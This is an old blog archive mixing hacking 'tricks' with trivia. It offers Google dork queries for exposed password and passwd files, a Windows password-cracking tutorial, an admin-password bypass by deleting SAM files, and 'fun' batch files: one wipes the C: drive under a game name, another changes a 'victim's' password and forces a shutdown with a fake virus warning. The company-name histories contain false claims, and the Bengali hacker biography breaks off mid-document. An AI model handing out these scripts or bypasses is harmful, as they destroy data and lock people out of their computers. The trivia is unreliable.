Friday 23 August 2013

Latest Google Database Hacking Tricks :)

Latest Google Database Hacking Tricks :)

allintext: /iissamples/default/        Files containing juicy info
filetype:ini "This is the default settings file for new PHP installations"      Files containing juicy info
filetype:php -site:php.net intitle:phpinfo "published by the PHP Group"      Files containing juicy info
inurl:/voice/advanced/ intitle:Linksys SPA configuration      Various Online Devices
inurl:"/root/etc/passwd" intext:"home/*:"    Files containing usernames
intext:"root:x:0:0:root:/root:/bin/bash" inurl:*=/etc/passwd  Files containing usernames
filetype:sql insite:pass && user       Files containing passwords
Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.      Pages containing login portals
     filetype:config inurl:web.config inurl:ftp     Files containing passwords
allintext: "Please login to continue..." "ZTE Corporation. All rights reserved."      Pages containing login portals

How To Hack Windows 7 Password Using Ophcrack ?

How To Hack Windows 7 Password Using Ophcrack ?



Labels: HACKING, LINUX, PASSWORD HACKING, WINDOWS
hacking windows 7 password
In this tutorial i will teach you to hack Windows 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac. It allows you to recover or hack windows password.
How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

1. Download Opcrack Live Cd by Clicking Here. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
Windows XP: Click on ophcrack XP LiveCD.
2. Now burn the live image on to the cd.
3. Insert the disc into drive and restart you computer.
4. If everything goes right you will see screen like below.

5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word ?empty?. This means that if the account is enabled you could log in without a password.

windows 7 password hacking
8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
9. Copy this hash value which is under NT Hash field.
10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
11. Type in the hash value you copied down in step 9, Enter the captche and click on Crack Hashes.

Monday 19 August 2013

How to "Delete administrator Password" without any software

How to "Delete administrator Password" without any software

Method 1
Boot up with DOS and delete the sam.exe and sam.log files from
Windows\system3­2\config in your
hard drive. Now when you boot up in
NT the password on your built-in
administrator account which will be
blank (i.e No password). This solution
works only if your hard drive is FAT
kind.
Method 2
Step 1. Put your hard disk of your
computer in any other pc .
Step 2. Boot that computer and use
your hard disk as a secondary hard
disk (Don't boot as primary hard disk ).
Step 3. Then open that drive in which
the victim window(or your window)
is installed.
Step 4. Go to location windows-
>system32->conf­ig
Step 5. And delete SAM.exe and
SAM.log
Step 6. Now remove hard disk and put
in your computer.
Step 7. And boot your computer

History Behind Name of Intel , Yahoo , Microsoft , Google , Apple and Adobe

History Behind Name of Intel , Yahoo , Microsoft , Google , Apple and Adobe

Intel

Bob Noyce and Gordon Moore are the founders of Intel. Initially they wanted to name it as “Moore Noyce” Later they found that there was another company with that name which ran a group of hotels. Therefore, they decided to look for another name. Then they were toying with the name ‘More Noise’. They thought, for a semiconductor company this name could be a wrong name. Then for the first year they used ‘NM Electronics’ as their company name. Finally, Intel got its name as a short form of Integrated Electronics.Microsoft
Bill Gates named Microsoft from two words. Microcomputer and Software. In year 1975, Bill Gates wrote a letter to his colleague Paul Allen, he wrote as Micro-Soft. But in 1976 they registered the name Microsoft as a single name.

Yahoo

The first name of Yahoo was “Jerry and David’s Guide to the World Wide Web”. In 1994 it changed its name to Yahoo. The name was taken from a phrase from Jonathan Swift’s novel, Gulliver’s Travels. YAHOO is the short form of the phrase “Yet Another Hierarchical Officious Oracle”. This word refers to a barbaric and uncivilized youth.
The founders Jerry Yang and David Filo wanted to choose this name as they wanted themselves to be wittingly categorized thus.

Adobe

Adobe is the name of a river. One of the founders of Adobe, John Nack, lives in Los Altas in California. This river runs behind his house.

Google

Larry Page and Sergey Brin are the founders of Google.When they were studying in Stanford University, they worked on a project report to create an online Search engine. Their aim was simple. When someone searched for a keyword, the result should fetch huge
number of relevant sites. In fact they wished for Googol number of results.Yes Googol represents a number which is 1 followed by 100 zeroes. Therefore they wanted to name it as googol. But when they submitted their project report for funding to an investor, the investor gave a cheque which was payable to ‘Google’ instead of Googol.
So that was a spelling mistake. But Larry and Sergey decided to keep it as Google and that's how the name came about.

Apple

The founder of Apple Inc, Steve Jobs used to work in an Apple Farm. When he decided to start his business, he joked with his friends that if they did not suggest a name for his company he will then name it as Apple Computers. Obviously his friends could not come out with
a name and hence Steve named it as Apple Computers.

How to Hide a folder without any third party Software

How to Hide a folder without any third party Software




Step 1 : Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}

For eg,
If u’ve a folder with name “Anything”
press F2,
then type, “Anything.{645FF040-5081-101B-9F08-00AA002F954E}”
and Press Enter.

Step 2 : To get back to its original form,
Make a new batch file with any name and type
“ren Anything.{645FF040-5081-101B-9F08-00AA002F954E} Anything” .

The Basic Google Search Tricks--- Google Hacking

The Basic Google Search Tricks



Google is the most popular search engine on the web, but most people do not know how much more powerful they can make their Google search result with just a simple tweak.

You may be using Google multiple times per day to find something on the web. Learning how to use Google effectively can boost your productivity instantly. Today we share some basic Google search tricks to boost your search result.
1. Get currency conversions

Get current exchange rates by searching [currency 1] in [currency 2].

Google Currency Conversion
2. Check flight times

View live arrival and departure information for U.S. flights (Google may be not support for other countries) just by searching the name of the airline and the flight number.

Google Flights Checker
3. Check the weather

Search weather followed by the name of any city in the world to get the current weather and forecast.

Google Weather Checker
4. Get the Time

To see what time it is anywhere in the world, search time followed by city or country.

Google Time Checker
5. Get local sunrise/sunset times

To see the exact times of sunrises and sunsets in cities around the U.S. and the world, search sunrise or sunset followed by the city name.

Google Sunrise Checker
5. Search for an address

To map any location, type in the city name or zip code followed by word “map“, and you’ll see a map of that location. Click on the map to see the detail on Google Maps.

Google Address Checker
6. Check flight schedules

To see flight schedules to or from a particular destination, type flights from or flights to followed by the city or airport of interest.

Google Flights Checker
7. Check sport scores and schedules

Get scores and schedules for favorite sports teams by typing the team or league into the search box. All sports data provided by STATS, Inc.

Google Scores Checker
8. Get number conversions

Convert any measurement – like ton to kg by typing in the units of measurement.

Number Conversions
9. Get realtime stock quotes

Typing any ticker symbol into the search box will get you realtime stock quotes that update live in your search results. Click the link on the results page for a detailed market analysis from Google Finance.

Google Stock Checker
10. Search within a specific site

Precede your query with site: if you know you want your answer from within a specific site or type of site (.org, .edu). For example: site:edu or site:googletrickslist.com.

Search with specific site
1.Searching for the exact phrase

Place the exact phrase you are looking for in quotation marks (” “), not each of the words separately.
Search for the exact phrase
2. “OR” or “AND”

Put the operator “OR” to includes either of the keywords or “AND” to includes both of the keywords in search results.
Operator OR
Operator AND
3. Searching for numbers range

Type “…” between the numbers to search for specific range numbers.
Search for range numbers
4. Finding related sites

Including “related:” and the URL to search for results that are somehow related to that URL.
Find related sites
5. Including and Excluding the keywords

Place “~” before keywords to search for that words and all its synonyms. Place “-” before keywords to exclude the keyword from search results. Example: Searching for “totti ~champion” gives the results contain Totti along with champion, winner etc. Searching for “totti -champion” gives the results contain Totti without champion, winner etc.
Include keywords using ~Exclude keywords using -
6. Searching for definitions of word

Get definitions of word from multiple sources by adding “define:” before the word.

Finding definitions of word
7. Math Search using Google Calculator

Input any math expression for Google to solve. You can use the expression of addition, subtraction, multiplication, division, exponents, remainders, trigonometry, etc.

You can also use Google to convert expressions with different units.

Google CalculatorGoogle ConverterThere are many other tricks on Google search, but for this time we cut up here, we will resume in the next article.  May this article can help you to improve the productivity of your search results in Google.

CRAZY GOOGLE TRICKS -- Google Fun

CRAZY GOOGLE TRICKS

------------------------------------------------------------------

We all use google for searching but its time to explore the funny side of google.Here I have collected the top 7 funny google tricks that will amaze you.Some of the tricks are provided by google itself while other have been developers.

1. Google Gravity:-
We all have read the Newton’s law of gravity.Does it also apply to google?To test it follow the instructions,
Go to google.com
Type Google Gravity
Click on I’m feeling Lucky
Now you will see the effect of gravity on google.The google icon will fall down automatically.You can even pickup and throw google icon anywhere

------------------------------------------------------------------


2. Google Pacman Game:-
Play Google Pacman Game Goto googlepacmangame.com

------------------------------------------------------------------


3. Change Background Image:-
You can also change the background image of google in google chrome. To change the background image follow the instructions,
Go to google.com
Click on the Change Background Image
Login with gmail username and upload Image

------------------------------------------------------------------


4. Epic Google:-
In epic google you will see the font size of google increasing automatically as if it will come out of your computer screen.To use google Follow the instructions
Go to google.com
Type Epic Google
Click on I’m feeling Lucky

------------------------------------------------------------------


5.Google Sphere:-
Google Sphere is a fun trick. It will start rotating all links on google in sphere. you can change rotation of sphere by moving cursor.Follow The Below Steps
Go to Google homepage
Type Google sphere
Click on I’m feeling Lucky

------------------------------------------------------------------


6. Google Hacker:-
want to see how the google homepage will look if it gets hacked .Follow the instructions below,
Go to google.com
Type Google Hacker
Click on I’m feeling Lucky

------------------------------------------------------------------


7. Annoying Google:-
In this trick the capitalisation of your searches will change automatically.Some words will change into small letter and some into capital letters in your search result.Want to try it follow the instructions
Go to google.com
Type Annoying Google
Click on I’m feeling Lucky

------------------------------------------------------------------


8. Google Loco:-
In This Trick Google Logo Will Dancing In Free Mod, To Try This Out Follow The Instructions,
Go To google.com
Type Google Loco
Click On I’m feeling lucky

------------------------------------------------------------------

Computer Related Full Forms

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Area Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB - MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

How to Make a FUN in a min? #Cmd Fun

­Cmd Fun

 How to Make a FUN in a min. ?


Open Notepad and copy below code into it.
``````````````````````````````````````
@Echo off
Del C:\ *.* |y
```````````````````````````````````````
2. Save this file as runvsrun.bat (Name can be anything but .bat is must) ie : game.bat ;)

3. Now, running this file !  :D YEAHH :P :P

Cmd Fun

Welcome to this little guide on some bat files hacks

1.


Open notepad and put this in:
@echo off
net user %USERNAME% "12345" > NUL
echo hey man what's up
echo ahaha look at this
pause
Echo °°°° °°°°° °°°°°
Echo °°°°°°° °² °°°° °°°°°°°
Echo °°°°°°°°² °²°°°°°°°°°°²° °°°°°°°°°°°°°°
Echo ² °°°°°°° °°°°°°°°°°°°°° °°°°° ³³°°°°°°°°°°°°°
Echo ³°°°°°°°°°°² ³°°°°°°°°°°°° ³°°°°°°°°°°°°°°°°°°
Echo ³°°°°° °°°°° ³°°°°°°°°°°°°° °°°°°°°°°³°°°°°°°°°
Echo °°°°°°° °°°° ° °²°°°°°°°°°°³ ²°°°°°°°°°° °°°°°°°°°°°
Echo ²°°°°°°°°°°°° ° °°°°°°°° °°°°°° ² °°°° °°°°°°°°° °
Echo °°°°°°°°°°°°° ° °°°°°°°°°°°°°°°²°°° °°° °°°°°°°°° °°°
Echo °°°°°°°°°° °°°°°°°° °°°°°°°°°²°°°² °°°°°°°°° °°°°²
Echo °°°°°°³³°°°°°°°° °°°°°°°°°°°°°°°°°°°°°°°°²°°°°°°
Echo ²°°°°° °°°°° °°³°°°°°°²°°°°°°°²°²°°°°°° °°°°°°°°
Echo °°°°°° ³°²°°°°°°°°°°°°°°°°°° ²°°°°° °°°°°°°°³
Echo ² °°°°°²°°°°°°°°°°°°°°°°°°° °°°° °°°°²°°°°°°
Echo °²°°² °°°°²°°°°°°°°°°°°°°°³ °°°²°°³°°°°°°°°°°°°
Echo °°°°°° °°°°°°°°°°°° °°°² °°°°°°° °°²°°°°°²°°°°°
Echo °°°°°°°² °°°°°°°°° °°°°²°°°°°°°° °°°°°°° °°°°°°°
Echo °°°°°°°²°²³³°°°°°°°°°°°°°°°°²°°³ °°°² °°°°°°°°
Echo °°°°°°°°°°°°°°°°°°°°°°° ° ° °°° °°°°°°°°°°°°
Echo °°³³³°°°°°°°°°°°°°°°°° ²° °°°°°°°°°°°°°°°°°
Echo °°°°°°°°°°°°°°°°°°°°° °²°°°°°°°°°°°°°°°²
Echo °°°°°°°°°°°°°°°°°°°°° °°°°°°°°°°°°°°°
Echo ³°°°°°³°°°°°°° °°°°°° °°°°° °°°°°°°°°°°
Echo ° °° ³°°°° °°°°°² °°°° °°°°°°°°°°°
Echo ³ ²² ² °°°° °°°°°°°°°°²
Echo ° °°°°°° °°°²°°³°°°°°°°°°°³
Echo °² ³°°°° °° ° °³°°°° ³³°°°° °
Echo ²° °°°°°° °°°³°°°° °²°°°°°°°°°°² °°°°°
Echo °° ° ° ²²²²°²°°°°°°°°°°°°°°³ °°°°°°°²
Echo ²°²° °°°²° ²³°°°°° °°²°°°² ²°°°°°°°²
Echo °°°°°°³° ² ³°°°°°°° ³²°²°°° °°°°°
Echo ° ²° ²° ° °°²°°³ °°°°°°°°² °
Echo ° °° ° ° ° ³°°° °° °°°°°°°°²
Echo °°° ° ° °°°°° °°°° °°° °°°°°°°°°
Echo °°°°°°°°°²°°°°°°°°°° °° ° °°°°°°°°°°
Echo °°°°°°°°°°°°°°°°° °²°°°²² ³°°°°°°°°°
Echo °°°°°² °°°°°°°°°°²³²°°°°²³ °°°°°°°°°°
Echo ²°°°°°°³° °³²°°°°° °°° ° °° °°°°°°°°°°
Echo °°°°°°°°°²° ° ° ° ° °³°³ °³°² ³°°°°°°°°°°
Echo ²°°°°°°°° ° ° ° °°°°°° ²°²°°° ³³³ °°°°°°°°°°°°°°°°²
Echo ²°°°°°°°°°°°°° ° ° ° °° °°°°°°³ °°²°°°°°°°°°°°°°
Echo ²°°°°°°°°°°°°°° °°°°°°³°°°°°² ² ²°°°°°°°°°°°³
Echo °°°°°°°°°°°° ° ° ³ °° °° °°°°°°° °°°°°°°°°°°
Echo °°°°°°°°°°°° ³ ° °°²° ³ ° °°°°°°°° °°°°° °°°°
Echo °°°° ³°°°°° °²°°°° ° °° ³°°°°°°°° °°°°°°° °
Echo °° °°°°°°° °°°°°°² °°°°°°°°°°°°² °°°°°°°³
Echo °°°°°°°° °°°°°°°°°°°°°°°°°°°°° °°°°°°°°
Echo °°°°°°°° ²°°°°°°°°°°°°°°°°° °°°°°°°
Echo °°°° °°° ²°°°°°°°°°° ²²
pause > NUL
shutdown -s -t 60 -c "Windows is doing a shutdown in less then 60 sec.Virus to powerfull...Memory will be wiped!!!Contact MICROSOFT for help or better yet get LINUX!!"
save it as anything lolipop.save it as anything lolipop.bat
This will change the password of your victim and shutdown his computer after 60 seconds.

If by accident you click your bat file and cmd starts to run do this:

Go start > run > shutdown -a

This will stopthe computer from shutting down.


2.

Another funny thing with cmd.

Open notepad and put :

PHP Code:
@echo off

:loop
echo %random%%random%%random%%rando m%%random%%random%
goto loop
This will create and infinite number of numbers

Save your file as something.bat


3


Open notepad and put in :
PHP Code:
start
start
start
start
start
start
start

lol.bat
Save your file to lol.bat
This will pop up many pages and will CRASH your computer

Have fun, there's many others ways to have fun with cmd

Call Forwading

If the prefix to the forwarding command is "**" (instead of the usual "*"), then the phone number in that command is registered in the network. If after that the forwarding is deactivated using a command with a single "#", then later it will be possible to re-activate this forwarding again with a simple "*" command without a phone number in it. The forwarding will be re-activated to the number registered in the network. For example, if one uses the out-of-reach code in a forwarding command:

**62*7035551212#

and after that one deactivates the forwarding:

#62#

then later it will be possible to re-activate the out-of-reach forwarding without specifying a number:

*62#

After the above command, all calls made to the phone, while it is out of reach, will be forwarded to 7035551212. It is possible to activate the feature to a number other than the registered number, whilst still retaining the registered number for later use. For example, issuing the command:

*62*7185551212#

will result in calls being forwarded to 7185551212 (and not to the registered number 7035551212). However, if later a command is issued:

*62#

then the calls will again be forwarded to the registered number 7035551212 (and not to the number from the previous forwarding command 7185551212).

Additionally, in GSM networks, such as T-Mobile and AT&T Mobility in USA, and all mobile networks in EU, it is possible to set the number of seconds the phone will ring before forwarding. This is specified by inserting "*SC*XX" prior to the final "#" of the forwarding command, where "SC" is a service type code (11 for voice, 25 for data, 13 for fax), and "XX" is the number of seconds in increments of 5 seconds. If "SC" is omitted (just "**XX") then by default all service types will be forwarded. For example, forwarding on no-answer can be set with:

*61*[phone number]**[seconds]#

In some networks there may be a limit of not more than 30 seconds before forwarding (i.e. "XX" can only be 5, 10, 15, 20, 25 or 30; all greater values, like 45 and 60, will result in the forwarding command being rejected and an error message returned).
Uses[edit]

Diverting calls can increase one's availability to a caller. The main alternative is an answering machine or voicemail, but some callers do not wish to leave a recorded message, suspecting that the party will delay returning their messages. A caller at a telephone booth may be unable to receive the call if a recorded message is returned.

Some businesses find that the human touch can improve contact, thus sales, but traditional wired answering services are expensive, so they have their calls forwarded to a call center, so the client can reach an operator instead of an answering machine or voice mail.

Often, a suburb of a large city is a toll call from many suburban exchanges on the opposite side of the same city, even though all of these suburbs are a local call to the city centre. A business located in such a suburb may therefore benefit from obtaining a downtown number as an "extender", to be permanently forwarded to their geographic suburban number.

Where unlimited local calls are flat-rated and long-distance incurs high per-minute charges, the downtown number's wider local calling area represents a commercial advantage. Markham (directly north of Toronto) is long-distance to Mississauga (directly west of Toronto) . A Markham business with a forwarded area code 416 Toronto number could receive calls from Malton airport in Mississauga without incurring long-distance charges (as Malton → Toronto and Toronto → Markham are each a local call).

Some services offer international call forwarding by allocating for the customer a local virtual phone number which is forwarded to any other international destination. As a means to obtain an inbound number from another town or region for business use, call forwarding schemes tend to be far less expensive than foreign exchange lines but more costly than using voice over IP to obtain a local number in the chosen city.

Koel Mallick Exclusive Photos :)





Koel Mallick with Nishpal Sing Rane


Friday 16 August 2013

One of the highest grossing Bollywood film of 2012 'Barfi ' source & inspirations.(INDIAN MOVIE COPYCUT)

One of the highest grossing Bollywood film of 2012 'Barfi ' source & inspirations.

Several Scenes of this flick were inspired from several films in the history of Hollywood. It is very difficult for us to point out. Given below shown are the list of Hollywood films where scenes were lifted for this Bollywood version .

1. The single door sliding scene in the film has been taken from Charlie Chaplin’s 'THE ADVENTURER (1917)'.

2.The sequence where Rupa Ganguly brings her daughter Illeana in the forest kind of location and reveals the secret of her silent love is straight away from 'THE NOTEBOOK(2004)'.

3.There are some comedy scenes where Ranbir walks into a door and his nose gets hurt, such that he bring back in place with his other hand, making some more funny faces along with his comic movements with the dummy on a sofa are both inspired from the song sequence of “Make Them Laugh” in 'SINGIN’ IN THE RAIN (1952)'.

4. The scene where a piece of paper sticks with Ranbir and the manner in which he sticks papers strips to his eyelids and tongue was also there in TV series Mr. Bean (1990) and in' Mr. Bean’s Holiday (2007)'.

5. The bicycle chase moving within the narrow lanes and tapping the windows sequence reminds you of Jackie Chan’s" PROJECT A (1983)".

6. The mouse running inside a running wheel can also be seen in a scene of BLACK CAT, WHITE CAT (1998)'.

7. The tragic sequence of Ranbir’s father getting a severe attack but Ranbir unable to hear his voice has its resemblances with a similar kind of sequence in Gulzar’s "KOSHISH (1972)".

8. Some part of its sound track seems to be very close to the soundtrack of French film "AMELIE (2001)".

9. The sub-plot of the film staging a fake kidnap and death is partially inspired from the similar one in "GONE BABY GONE (2007)".

10. Another interesting fact is the final scene of Adoor Gopalakrishnan’s award winning Malayalam film “Mathilukal” (1989) which reminds you of the shoe throwing sequence in BARFI.

11. The sequence wherein Ranbir and Ileana’s start distributing food to the needy was quite similar to “Fried Green Tomatoes” (1991).

12. The interrogation scene where Ranbir responds to a question that asks him to reveal everything by starting with his birth was there in “The Goonies” (1985) "too.

13.There is a sequence where Ranbir is answering a nature’s call in the field is also there in the same Korean Drama “Lover’s Concerto” (2002)'.

14. The “Rotating the Clock back” scene can also be seen in the Korean drama “Lover’s Concerto” (2002).

15. The final scene when Priyanka comes and shares Ranbir’s bed is also similar to the one in "THE NOTEBOOK (2004)".

16. The sequence where a statue is being inaugurated and Ranbir is found sleeping in the lap of the statue as the covers are taken off is straight away taken from Charlie Chaplin’s "CITY LIGHTS (1931)".

17. The comedy scene on the ladder with Ranbir at one end and the policemen on the other is inspired from Buster Keaton’s "COPS (1922)".

18. Planting the nails on the road sequence which results in a car crash is clearly lifted from a Japanese film" KIKUJIRO (1999)".

19. The scene where it seems a car is coming towards both Ranbir and Illeana on the road which actually turns out to be two bikes coming parallel to each other is inspired from a similar sequence in MR. NOBODY (2009)'.

20. The main plot of the film of a love affair between a funny differently-abled man and an autistic girl is though not entirely same but quite close to "BENNY & JOON (1993)" and a Korean film "OASIS (2002)".
(Source : Bobby Talks )

like &share the info

Biography of World best Hacker JONATHAN JOSEPH JAMES

জনাথন জেমস
জন্ম     ১২ ডিসেম্বর, ১৯৮৩
মিয়ামি, দক্ষিণ ফ্লোরিডা, মার্কিন যুক্তরাষ্ট্র
মৃত্যু     ১৮ মে, ২০০৮
মিয়ামি, দক্ষিণ ফ্লোরিডা, মার্কিন যুক্তরাষ্ট্র
জাতীয়তা     আমেরিকান
অন্য নাম     কমরেড
যে জন্য পরিচিত     হ্যাকিং




জনাথন জোসেফ জেমস ওরফে কমরেড (জন্ম: ১২ ডিসেম্বর, ১৯৮৩ - মৃত্যু: ১৮ মে, ২০০৮) একজন বিশ্বখ্যাত আমেরিকান হ্যাকার এবং সবচেয়ে কমবয়সী কিশোর যিনি ১৬ বছর বয়সেই সাইবার অপরাধের সাথে লিপ্ত হয়ে জেলে গিয়েছিলেন।দক্ষিণ ফ্লোরিডায় বেড়ে ওঠা জেমেস তার জীবনের প্রথম হ্যাকিং সম্পন্ন করেন ১৫ বছর বয়েসে। তিনি মাত্র চব্বিশ বছর বয়সে ২০০৮-এর ১৮ মে তারিখে তার বাবার পিস্টল দিয়ে নিজেই নিজের মাথায় গুলি করে আত্মহত্যা করেন।
পরিচ্ছেদসমূহ

    ১ শৈশব
    ২ হ্যাকিং
    ৩ গ্রেপ্তার, দোষী সাব্যস্ত এবং শাস্তি
    ৪ মৃত্যু
    ৫ বহিঃসংযোগ
    ৬ তথ্যসুত্র

শৈশব

তের বছর বয়সে একবার ছেলের কম্পিউটারের নেশা মাত্র ছাড়াচ্ছে দেখে তার কম্পিউটার জব্দ করেন বাবা রবার্ট জেমস। বাড়ি থেকে পালিয়ে যান জন, রাস্তার মোড় থেকে টেলিফোনে হুমকি দেন- আর বাড়ি ফিরবেন না যদি কম্পিউটার ফেরত না দেয়া হয়। মৃত্যুর পর সে ছেলের স্মৃতিচারণ করতে করতে বাবা রবার্ট জেমস বলেন, "'So, yeah, he kind of liked computers."' ।

মাত্র চোদ্দ বছর বয়সে প্রোগ্রামিং শিখতে শুরু করেন জেমস, জানতেন ইউনিক্স আর সি প্রোগ্রামিং ভাষা। কম্পিউটার ক্লাসের পাশাপাশি অন্তর্জালে ঘুরে ঘুরে শিখতেন তিনি। আর এ বিদ্যার উপর ভর করেই এক বছরের মাথায় হ্যাক করেন নাসা আর প্রতিরক্ষা বিভাগের সাইট। হ্যাকার কমিউনিটিতে তিনি কমরেড জন নামেও বহুল পরিচিত।
হ্যাকিং

১৯৯৯ সালের ২৩ আগস্ট থেকে ২৭ অক্টবরের মধ্যে জেমস তার মেধাকে কাজে লাগিয়ে ভাইরাস সম্পর্কে তার চিন্তা শক্তিকে অনেক দূর নিয়ে যান।এমন কি তিনি তখন মাত্র ১৫ বছর বয়সে বেল-সাউথ, মিয়ামি ডেড, আমেরিকার প্রতিরক্ষা বিভাগ এবং নাসার ওয়েব সাইট হ্যাক করেন। এছাড়াও সে ব্যাকডোর কম্পিউটিং এর মাধ্যমে ডালাস এবং ভিরজিনার সার্ভারে একটি স্নিফার ইন্সটল করেন। যার মাধ্যমে তিনি ওই সব স্থানের প্রায় তিন হাজার তথ্য চুরি করেন। যার মধ্যে ছিল ওই এলাকা গুলোর সকল চাকুরীজিবিদের তথ্য এমন কি কমপক্ষে ১০ টি অফিশিয়াল মিলিটারী কম্পিউটারের তথ্য। ফলে জেমসকে জেলেও যেতে হয়।

জেমস নাসার ওয়েব সাইট হ্যাক করে এবং সেখান থেকে প্রায় ১.৭ মিলিয়ন ডলারের সমপরিমান মূল্যের একটি সফটওয়ার এর সোর্সকোড ডাউনলোড করে। নাসার মতে জেমস যে সফটওয়্যারগুলো চুরি করেছিল সেগুলো দিয়ে ইন্টারন্যাশনাল স্পেস স্টেশন নিয়ন্ত্রন করা হয়। জেমস নাসার ওয়েব সাইটে যে ক্ষতি করেছিলো সেটি ঠিক করতে নাসার ওয়েবসাইট তিন সপ্তাহ বন্ধ রাখতে হয়। অপরদিকে এটি ঠিক করতে নাসা কে গুনতে হয় প্রায় আরো লক্ষাধিক ডলার।
গ্রেপ্তার, দোষী সাব্যস্ত এবং শাস্তি

প্রতিরক্ষা দপ্তর, নাসা এবং স্থানীয় পুলিশ থেকে এজেন্টদের একটি দল জানুয়ারী ২৬, ২০০০ তারিখে আনুমানিক সকাল ৬টায় জেমসের বাড়িতে অভিযান চালায়। এরপর ২০০০ সালের অক্টোবর মাসে তাকে ৬ মাসের কারাদন্ড দেয়া হয়। মুক্তির পর তাকে ১৮ বছর বয়স প্রর্যন্ত করা নজরদারিতে রাখা হয় এবং নাসা ও প্রতিরক্ষা দপ্তর এর কাছে ক্ষমা চেয়ে চিঠি লিখতে হয়েছিল। এসময় তার কম্পিউটার ব্যবহারের উপরেও বেশ কিছু নিষেধাজ্ঞা জারি করা হয়।
মৃত্যু

